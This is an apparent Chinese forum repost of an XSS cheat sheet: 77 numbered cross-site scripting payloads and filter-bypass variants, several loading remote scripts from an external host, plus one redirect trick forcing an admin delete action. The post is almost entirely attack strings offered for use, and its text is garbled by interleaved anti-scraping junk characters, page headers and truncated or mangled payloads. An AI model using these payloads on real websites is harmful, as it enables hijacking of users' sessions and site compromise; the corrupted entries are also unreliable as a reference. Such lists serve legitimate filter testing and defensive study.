中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
$ \, V9 Y+ U6 s(1)普通的XSS JavaScript注入
/ K% z( b7 |3 L<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. C0 z! O8 E$ y' `# @0 S(2)IMG标签XSS使用JavaScript命令
" I2 D# R2 h. P5 H4 p/ u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 ?& D6 o$ \+ S+ P  ^! f8 m* }
(3)IMG标签无分号无引号/ r/ ~7 m. [! b. }' T7 O/ b) i
<IMG SRC=javascript:alert(‘XSS’)>/ `$ {0 `5 a3 N0 c
(4)IMG标签大小写不敏感2 _  k. Y# j4 ]$ B. r9 n! C+ T
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, V6 w( a/ U. S# I2 J
(5)HTML编码(必须有分号)4 r9 f4 y- i- T6 D, Z* b7 t
<IMG SRC=javascript:alert(“XSS”)>
8 ^2 u/ G/ [: a, K* O(6)修正缺陷IMG标签+ S/ i' j6 j3 i( `9 f8 f/ K
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 y& M( F( |2 [7 G
* q; u$ a# g; U! z9 |( @0 @" i) t6 d6 N. K) K& s
(7)formCharCode标签(计算器)
+ a0 Y4 g- I7 T" S1 p, h! P7 r<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>6 K* _6 ^/ ~; @: Q6 f# X
(8)UTF-8的Unicode编码(计算器)
5 y5 O* t3 n' ?. k4 D) W9 I+ n' e, q<IMG SRC=jav..省略..S')>1 u: \# E4 q8 e
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, k% R' b8 G2 y+ y. B% W) u% Z9 J<IMG SRC=jav..省略..S')>
7 f! O! I- L  a& a$ f(10)十六进制编码也是没有分号(计算器)2 g) u# k# S" K' s/ v
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
8 N" Z2 C8 J4 ?6 m- m  J& l/ [(11)嵌入式标签,将Javascript分开8 i5 i8 f" I+ E' m4 H
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 D' R; C0 U- e7 Y) p
(12)嵌入式编码标签,将Javascript分开
/ s' E: o0 ~' O( j: R<IMG SRC=”jav ascript:alert(‘XSS’);”>
% b5 M' c- p, j(13)嵌入式换行符6 ?( b3 m% e/ k# m
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 J; ~4 G* e% s0 {; l5 x; R
(14)嵌入式回车
; W- A$ g, L5 O" S; b6 E<IMG SRC=”jav ascript:alert(‘XSS’);”>4 a6 W' }' J# ^* C2 H: m+ H
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
% b8 l8 G/ _  p& [) b<IMG SRC=”javascript:alert(‘XSS‘)”>1 W  ^: [5 _: U! S. b- z# ^, l/ s
(16)解决限制字符(要求同页面)4 x5 q! s& n: b8 I' e2 {
<script>z=’document.’</script>
0 w  K' H( U: A9 \4 }- Q$ X6 {<script>z=z+’write(“‘</script>9 I/ J2 E9 w' I' T
<script>z=z+’<script’</script># r% k$ c1 R5 l3 G
<script>z=z+’ src=ht’</script>+ ^* U5 v4 s8 k' K  y
<script>z=z+’tp://ww’</script>
6 [7 h2 r/ R# x  S: X5 P% ?( T<script>z=z+’w.shell’</script>
6 D7 v4 ^: d- A( M0 X2 e<script>z=z+’.net/1.’</script>) M4 g/ i  E- K" C5 A
<script>z=z+’js></sc’</script>
5 ^$ S' u/ r# s5 g* K. ]; H<script>z=z+’ript>”)’</script>
. \) w# E2 s' t0 G4 X7 E9 a<script>eval_r(z)</script>
8 C9 ?- a3 `. Z# g3 u) I(17)空字符12-7-1 T00LS - Powered by Discuz! Board
7 j+ d0 x; n1 e8 m3 a+ Whttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
$ {4 x& R4 l1 z& pperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
) F9 H- x8 H5 ^8 ^( r8 |% u(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用+ Y2 L1 w( V3 Y) [4 W7 k7 `& w; I
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 E% U" K0 O  h5 o9 V  G6 g" x(19)Spaces和meta前的IMG标签1 r, ^- N, _1 |+ e" g* h, L" N
<IMG SRC=” javascript:alert(‘XSS’);”>
0 ?% Z) `4 N7 J4 H(20)Non-alpha-non-digit XSS
5 F* w$ L' u/ J# J<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
  ]( k+ `5 G- w/ s(21)Non-alpha-non-digit XSS to 2
/ X, j% }2 Q% e) X  P2 l8 S# q' t<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 f; j7 \' x) J, J6 q  A0 V0 p(22)Non-alpha-non-digit XSS to 3
- C) z" U& R' W# t/ I3 Y2 W9 Y<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! L* k3 D! K7 ?(23)双开括号
" E/ e' V# B4 `9 b& Z7 m* y<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. K$ Y' g" e4 i$ [# w7 ]! p(24)无结束脚本标记(仅火狐等浏览器)/ t1 s2 h0 t* y% `2 \0 k: m
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 v: K$ o0 `' O- X. O(25)无结束脚本标记2
6 l7 X/ `3 E" K$ m, z, X2 n<SCRIPT SRC=//3w.org/XSS/xss.js>  X' g: M: a+ O' y0 H+ `
(26)半开的HTML/JavaScript XSS
! O6 }3 I' v4 s+ v' A<IMG SRC=”javascript:alert(‘XSS’)”
5 v3 z- @- Y: l% ]- e1 L% p(27)双开角括号
# p6 e9 a) E% _<iframe src=http://3w.org/XSS.html <0 p' Y) r! \  @; l8 b  w
(28)无单引号 双引号 分号
$ Q  H- O! @( j; k  a- }% V<SCRIPT>a=/XSS/
& o0 V. Y. F- |! ialert(a.source)</SCRIPT>* N$ ?5 i+ `" Q; _' Q2 \* \5 f
(29)换码过滤的JavaScript
1 x& B. \  b5 x9 z2 E9 l  ~' k\”;alert(‘XSS’);//3 U- e( _( A) z$ c0 @  }* \( ~& ]! p
(30)结束Title标签) \$ k' m7 h5 o3 x5 @+ N
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& r: Z: O, q/ B* E(31)Input Image7 q5 y/ {: Y4 |8 h5 \
<INPUT SRC=”javascript:alert(‘XSS’);”>" A- O* I8 s/ Q' \, t
(32)BODY Image# H* e  ~9 Z/ @: l, p0 l
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 e# b5 Y$ X! S6 `(33)BODY标签1 i2 |, `  U; w$ I! A: N4 q
<BODY(‘XSS’)>! C) o% i. H" @/ o5 a
(34)IMG Dynsrc# Y5 ?! a6 j5 S8 ^8 W- H5 U/ W1 y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
3 c' ]  w4 A; y(35)IMG Lowsrc
9 d3 H  m+ a8 B/ B<IMG LOWSRC=”javascript:alert(‘XSS’)”>
1 A* t& V3 E1 e5 p6 c(36)BGSOUND% k1 C! L% A9 N+ T- C
<BGSOUND SRC=”javascript:alert(‘XSS’);”>1 Q' ?; L% U+ M1 S. Q, ~
(37)STYLE sheet, v* b* ~3 {! B/ F9 X! D8 w! a# q
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
* Q6 v2 @" G9 x. j(38)远程样式表
- o8 s% h% p: G. K- K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>; R, R" k& m, i/ N5 s; Z
(39)List-style-image(列表式)$ L% {3 J* {6 G0 l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" w) \" \6 [- Q3 T3 _% @: s9 u% X( C(40)IMG VBscript$ N4 }* M% g3 D- s- D* \
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS5 F2 Z* I8 U# R3 v4 ^- G: x
(41)META链接url) D: F1 [) X0 X' `) f
. c4 }! _# r2 y4 y. ~

. N- _9 X8 z4 G# s$ t# K<META HTTP-EQUIV=”refresh” CONTENT=”0;* K0 g7 _+ {( ^* Q1 }6 L/ w
URL=http://;URL=javascript:alert(‘XSS’);”>' M' F2 H) S+ w  |3 G/ z8 k
(42)Iframe
% a8 {. e- n, z3 ~<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
( n7 N) w4 o5 F(43)Frame
) f' d4 l; e  l4 }* F( f<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
/ A; }0 R2 j( M# g& W5 Ohttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
6 o' G. ~4 z. x5 s(44)Table
" ?9 a) {1 E7 r' ?" d; ]* g& v: c<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 q. i* v" I  V  z4 p) j1 C( Z
(45)TD
1 K( ~& Z, b3 m) K: o0 `<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% E- I! x  C. I
(46)DIV background-image- k/ K3 x( g* u' r/ k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ r7 |6 V8 ]8 I( V
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-' z/ f) u; X& L( W2 f7 W
8&13&12288&65279)
% P; ]1 U4 d% ?<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& l; o  F: c- Y7 x6 J(48)DIV expression
0 L0 {! {) j6 y; M# _' h<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 ^' J. k; X2 I& Q% n  Z  u(49)STYLE属性分拆表达
5 v* e( v, W. z8 n6 ?0 d<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 i. d- q) k* n1 Z% a& Z7 B( R(50)匿名STYLE(组成:开角号和一个字母开头)& P! Q2 |0 S, {$ u2 {
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>! q6 @* F( ?& k9 g, f* V, Q
(51)STYLE background-image* e# u, g: e; a2 Y  d2 [. C
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
( s  V' W4 k% h  l3 w7 lCLASS=XSS></A>
0 U  C" C6 o9 @(52)IMG STYLE方式# N7 P# k; m- C/ f; |
exppression(alert(“XSS”))’>: w- E; D) ?! R- A
(53)STYLE background2 o/ P2 c2 B# A& u( ?
<STYLE><STYLE
# t3 f* V8 A; ltype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' Z9 Q- o" S/ A& d( F+ E$ _: `' @- ~; K(54)BASE
4 i, L  K( K1 S% f<BASE HREF=”javascript:alert(‘XSS’);//”>8 f* W2 m5 |6 u5 u# r6 `; D* G1 y
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, `  w+ W* j6 C; i6 J<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>9 W9 @3 ?+ f7 K' `3 ]0 Q2 T1 h
(56)在flash中使用ActionScrpt可以混进你XSS的代码
/ p3 R" Y7 Q  Y9 Ta=”get”;4 b& Z+ |: F2 x1 Y. C% Z
b=”URL(\”";
$ v- q" W+ L8 Y- z) b) fc=”javascript:”;2 |! \6 n9 e5 ], ?. D( _3 ]
d=”alert(‘XSS’);\”)”;1 o1 ~3 c, H8 }: F1 i
eval_r(a+b+c+d);' K  i9 `4 M5 ?1 x
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上3 b) w" G2 [3 q% ]3 B4 `
<HTML xmlns:xss>* E" x, B, o- B+ U9 A
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
' z8 N: I% u$ `; j" e<xss:xss>XSS</xss:xss>
0 H# o; z2 A* J9 B; W9 p# d) {</HTML>  p  G; t; L4 C$ D4 h+ N' t- r% G
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
' k5 H# L, B# X, J<SCRIPT SRC=””></SCRIPT>. p, {/ g! {) k# ?% n
(59)IMG嵌入式命令,可执行任意命令* O+ h3 n, {: b2 b$ @' e# H7 f
<IMG SRC=”http://www.XXX.com/a.php?a=b”>6 J$ V1 u) Z$ [, w
(60)IMG嵌入式命令(a.jpg在同服务器)
( i  D9 J) `: v/ q! jRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser) j( U$ Y6 s/ r
(61)绕符号过滤& @: U: b- K  f6 q3 z4 H
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
; F% T( F; t1 n/ U0 q) @0 h, K. }(62)
, y6 I6 `7 U6 z/ J& f% U' K<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) T9 h5 R, w2 m' p  Z3 g/ e+ T(63)
% M5 Y7 v7 \( l$ e" ]<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
- m8 P+ N! [3 z+ z( M) H(64)
& X9 o3 H, M+ u' `  B4 g<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
: j- t6 ^# U% N" x(65)
( ^4 C0 j" T- j' c<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>) K8 ]8 i6 }1 f0 M. I4 z; q1 c
(66)12-7-1 T00LS - Powered by Discuz! Board2 W' Z- k% z0 F- a; h. A
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
' v: H) x. B& L# f; Y% p* S<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ ?- g0 w5 N4 f# k3 I(67)
+ H) Y" O7 _+ q5 [& J<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>/ ]4 T. T& J; }
</SCRIPT>
3 l. _1 T& Q8 Y" M0 K. W1 r(68)URL绕行7 R! \* ?1 _4 @
<A HREF=”http://127.0.0.1/”>XSS</A>
5 E9 ^; r2 S0 o! Z6 `; z(69)URL编码: E* R% R0 w3 ~" E3 i4 {
<A HREF=”http://3w.org”>XSS</A>
9 n# m. N# ]0 Y5 {! s(70)IP十进制
* ^5 g& g' g6 G, ?) a; I' X. B1 _<A HREF=”http://3232235521″>XSS</A>. l& N9 G$ {( a& p/ f* Y
(71)IP十六进制
! J% c( Y% y+ n" r3 D- S<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>" p( C* T+ T6 K3 O9 \5 m
(72)IP八进制
% n$ A! h9 `8 h1 h6 M) k9 \" z<A HREF=”http://0300.0250.0000.0001″>XSS</A>  U0 }9 O( m% S! D1 t5 Y
(73)混合编码
, S: U  c  C+ H<A HREF=”h
5 f; v$ ~4 w/ ?tt p://6 6.000146.0×7.147/”">XSS</A>
. Y, ^8 n5 F( M' I6 z5 E) L' u" H(74)节省[http:]  ~# h" p( C6 U1 t' c
<A HREF=”//www.google.com/”>XSS</A>
+ N7 T- @; E8 D) t" v2 r. l(75)节省[www]- J/ G& x7 ]( Z
<A HREF=”http://google.com/”>XSS</A>: y. {4 b' L0 {! T7 H
(76)绝对点绝对DNS
$ d1 l8 F5 t0 `7 X% F<A HREF=”http://www.google.com./”>XSS</A>7 x1 _$ I; h; x
(77)javascript链接
2 ~9 D- n/ L/ U6 U7 Q<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
. z7 C$ ]$ X2 F) g6 [0 a' f! b0 b8 L8 n: N2 {
原文地址:http://fuzzexp.org/u/0day/?p=14$ S4 M! t' d8 K- c

+ j: B; Q+ \& |7 R) N( C




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2